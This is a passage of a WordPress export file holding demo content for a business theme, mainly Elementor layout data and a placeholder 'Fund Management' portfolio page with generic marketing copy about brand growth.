brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"5789d963","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"788454d6","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"42dad2ce","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1e8fb8bb","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bd5ee3e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"25002852","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1c55a945","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2736d520","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3616c54e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"21d1388b","elType":"widget","settings":{"editor":"<p>November 09, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"55401017","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16c4f4c6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"307fcf31","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"3b72cfa8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"434e61f3","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"bc5d3c6","elType":"section","settings":[],"elements":[{"id":"ad0a18f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4140b8a","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9fcdfee","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"73a5235","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"d211887","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"03af914","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6638b36","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0a62d0d","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"13e76af","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"b03d1d5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"887b8a5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7560fc9","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"729a1b1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"79f25af","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"449ff09","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f1f7319","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"7309ef8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"a1c4ce4","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"61efd56","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"d75fc62","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1d99195","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"f9f8326","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"062449c","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"aaef46a","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Fund Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/</link>
		<pubDate>Fri, 11 Sep 2020 07:02:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=822</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>October 02, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>822</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:02:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:02:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fund-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[823]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4b87d4ec","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"f7bb697","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1a84b099","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1b756974","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"474af26d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"504f8cda","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1a48f134","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8c88c53","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"196761d3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7b262c88","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7a91d778","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"50b0e82d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5a058e3b","elType":"widget","settings":{"editor":"<p>October 02, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"662d291f","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"254317b1","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6d56a150","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"37b90133","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9e89dbb","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7243a5d","elType":"section","settings":[],"elements":[{"id":"8bc7b7f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"da6f9a4","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"292334f","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand 